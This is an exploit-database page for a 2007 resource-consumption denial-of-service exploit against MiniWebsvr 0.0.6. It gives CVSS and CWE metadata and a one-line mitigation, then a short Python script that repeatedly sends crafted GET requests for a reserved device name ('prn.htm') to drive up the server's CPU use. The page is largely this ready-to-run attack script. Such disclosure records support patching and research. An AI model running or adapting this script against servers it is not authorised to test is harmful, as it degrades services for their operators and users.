header-logo
Suggest Exploit
vendor:
MiniWebsvr
by:
shinnai
5.5
CVSS
MEDIUM
Resource Consumption
400
CWE
Product Name: MiniWebsvr
Affected Version From: 0.0.6
Affected Version To: 0.0.6
Patch Exists: NO
Related CWE:
CPE: a:miniwebsvr:miniwebsvr:0.0.6
Metasploit:
Other Scripts:
Platforms Tested:
2007

MiniWebsvr 0.0.6 (0-Day) Resource Consumption

This exploit targets MiniWebsvr version 0.0.6 and causes resource consumption, leading to high CPU usage. The exploit sends multiple GET requests to the server, which results in increased CPU usage.

Mitigation:

Upgrade to a patched version of MiniWebsvr or use an alternative web server.
Source

Exploit-DB raw data:

import socket

print
"-----------------------------------------------------------------------"
print "MiniWebsvr 0.0.6 (0-Day) Resource Consumption"
print "url: http://miniwebsvr.sourceforge.net/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Run this exploit and take a look to the CPU usage."
print
"-----------------------------------------------------------------------"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   for i in range (0,3):
       request =  "GET /prn.htm HTTP/1.1 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Unable to connect. exiting."

# milw0rm.com [2007-02-13]
cqrsecured